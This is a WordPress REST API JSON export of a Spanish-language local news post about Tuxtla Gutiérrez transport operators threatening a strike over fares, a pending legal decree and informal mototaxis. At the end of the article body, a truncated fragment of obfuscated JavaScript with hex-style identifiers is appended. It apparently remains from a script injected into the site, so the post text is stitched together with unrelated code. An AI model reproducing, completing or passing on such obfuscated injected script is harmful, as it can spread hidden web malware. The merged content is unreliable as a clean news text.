{"id":25084,"date":"2025-11-12T02:31:20","date_gmt":"2025-11-12T02:31:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25084"},"modified":"2025-11-12T02:31:21","modified_gmt":"2025-11-12T02:31:21","slug":"transportistas-amagan-con-paro-en-la-capital-chiapaneca-acusan-cerrazon-de-las-autoridades","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25084","title":{"rendered":"Transportistas amagan con paro en la capital chiapaneca, acusan cerraz\u00f3n de las autoridades"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432871-1024x768.jpg\" alt=\"\" class=\"wp-image-25085\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432871-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432871-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432871-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432871-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432871.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>11 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Transportistas amagan con la decisi\u00f3n de movilizarse surge despu\u00e9s de la cancelaci\u00f3n reiterada de reuniones de trabajo en la Secretar\u00eda de Movilidad y Transportes, lo que seg\u00fan los representantes del gremio, ha bloqueado todos los canales para atender la grave crisis que amenaza con colapsar al transporte formal en la entidad.<\/p>\n\n\n\n<p>Los transportistas han estructurado su pliego petitorio en tres ejes fundamentales:<\/p>\n\n\n\n<p>Tarifa de Supervivencia: Exigen la actualizaci\u00f3n inmediata de la tarifa de colectivo a $18.00 pesos, considerada vital para la viabilidad operativa ante el incremento generalizado de costos.<br>Vac\u00edo Legal: Requieren la creaci\u00f3n del decreto en la Ley de Derechos y de Ingresos, un pendiente derivado de la Ley de Movilidad publicada en junio, fundamental para brindar certeza jur\u00eddica y fiscal al sector.<br>Combate a la Informalidad: Solicitan medidas contundentes contra el transporte irregular, incluyendo la suspensi\u00f3n de permisos para mototaxis y operativos coordinados con la Fiscal\u00eda para judicializar a quienes operan al margen de la ley.<\/p>\n\n\n\n<p>&#8220;Esperamos que las autoridades sean emp\u00e1ticas con nuestro sector y reciban a una comisi\u00f3n de transportistas para dialogar&#8221;, expresaron los representantes del gremio, manteniendo abierta la posibilidad del di\u00e1logo.<\/p>\n\n\n\n<p>Aunque las fechas espec\u00edficas y el formato exacto de las protestas se mantienen en reserva, los organizadores confirmaron que ser\u00e1n anunciados en los pr\u00f3ximos d\u00edas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 11 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Transportistas amagan con la decisi\u00f3n de movilizarse surge despu\u00e9s de la cancelaci\u00f3n reiterada de reuniones de trabajo en la Secretar\u00eda de Movilidad y Transportes, lo que seg\u00fan los representantes del gremio, ha bloqueado todos los canales para atender la grave crisis que amenaza con colapsar al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25085,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25084","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25084"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25084\/revisions"}],"predecessor-version":[{"id":25086,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25084\/revisions\/25086"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25085"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}